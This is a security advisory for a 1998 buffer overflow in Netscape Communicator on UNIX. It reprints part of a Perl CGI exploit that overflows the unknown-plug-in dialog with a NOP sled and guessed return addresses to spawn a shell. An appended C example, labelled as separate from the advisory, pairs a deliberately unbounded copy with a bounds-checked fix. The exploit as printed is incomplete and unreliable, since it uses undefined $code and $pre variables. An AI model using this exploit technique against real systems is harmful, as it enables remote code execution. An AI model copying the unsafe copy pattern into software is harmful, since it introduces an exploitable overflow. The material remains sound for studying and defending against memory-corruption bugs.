Netscape Communicator (4.0x and 4.5) on a UNIX machine was found to be vulnerable to a MIME attack, making it possible to crash the client and possibly gain root access to the machine.
Netscape Communicator can be made to crash and execute arbitrary code by overflowing the dialog message shown when it encounters an unknown plug-in type. A malicious web site administrator can cause the remote Netscape program to execute arbitrary code by placing specially crafted content inside an HTML page.
The code that causes Netscape on a UNIX machine to turn into a "/bin/sh" program is included below:
#!/usr/bin/perl
#
# buffer-overflow-1.cgi -- Dan Brumleve, 1998.10.19
# This is very tricky business. Netscape maps unprintable characters
# (0x80 - 0x90 and probably others) to 0x3f ("?"), so the machine
# code must be free of these characters. This makes it impossible
# to call int 0x80, so I put int 0x40 there and wrote code to
# shift those bytes left before it gets called. Also null characters
# can't be used because of C string conventions.
# the first paragraph of the following turns the int 0x40 in the second
# paragraph into int 0x80. the second paragraph nullifies the SIGALRM
# handler.
my $nop = "\x90";
# this actually gets mapped onto 0x3f, but it doesn't seem
# to matter
my $address = "\x10\xdb\xff\xbf";
# wild guess, intended to be somewhere
# in the chunk of nops. works on every
# linux box i've tried it on so far.
my $len = 0x1000 - length($pre);
my $exploit = ($nop x 1138) . ($address x 3) . ($nop x $len) . $code;
# the first $address is in the string replaces another
# pointer in the same function which gets dereferenced
# after the buffer is overflowed. there must be a valid
# address there or it will segfault early.
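As an added illustration from the defender's side (not part of this advisory or of Brumleve's script), the C below sketches the bug class described above: a dialog message for an unknown plug-in type is built from the remote page's MIME type into a fixed buffer with no length check, next to a bounded form that refuses oversized types. The 4096-byte buffer, the message text and the function names are assumptions, not Netscape's code.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumptions (not Netscape's code): a fixed 4096-byte dialog buffer and
 * this message text stand in for the real unknown-plug-in dialog. */
#define DIALOG_BUF 4096
#define PREFIX "No plug-in is available for the MIME type: "

/* Vulnerable pattern: the remote page controls mime_type, and its length
 * is never compared against the dialog buffer, so a long Content-Type
 * writes past the end of dlg. Shown for illustration only; it is never
 * called below. */
void build_dialog_unsafe(char *dlg, const char *mime_type) {
    strcpy(dlg, PREFIX);
    strcat(dlg, mime_type);
}

/* Hardened form: size the message before copying and refuse, rather than
 * silently truncate, when it would not fit. Returns 0 on success, -1 if
 * the type is rejected. */
int build_dialog_safe(char *dlg, size_t dlg_len, const char *mime_type) {
    size_t plen = strlen(PREFIX);
    size_t mlen = strlen(mime_type);
    /* Compare without computing plen + mlen + 1, which could wrap. */
    if (dlg_len < plen + 1 || mlen > dlg_len - 1 - plen)
        return -1;
    memcpy(dlg, PREFIX, plen);
    memcpy(dlg + plen, mime_type, mlen + 1);  /* copies the NUL too */
    return 0;
}

/* Convenience check: would this Content-Type value be accepted? */
int mime_type_fits(const char *mime_type) {
    char dlg[DIALOG_BUF];
    return build_dialog_safe(dlg, sizeof dlg, mime_type) == 0;
}

int main(void) {
    /* Constructed sample input: a Content-Type roughly the size of the
     * exploit's padding (0x1000 nops plus trailer). */
    char *big = malloc(0x1100 + 1);
    memset(big, 'A', 0x1100);
    big[0x1100] = '\0';
    printf("normal type accepted: %d\n", mime_type_fits("application/x-unknown"));
    printf("oversized type rejected: %d\n", !mime_type_fits(big));
    free(big);
    return 0;
}
```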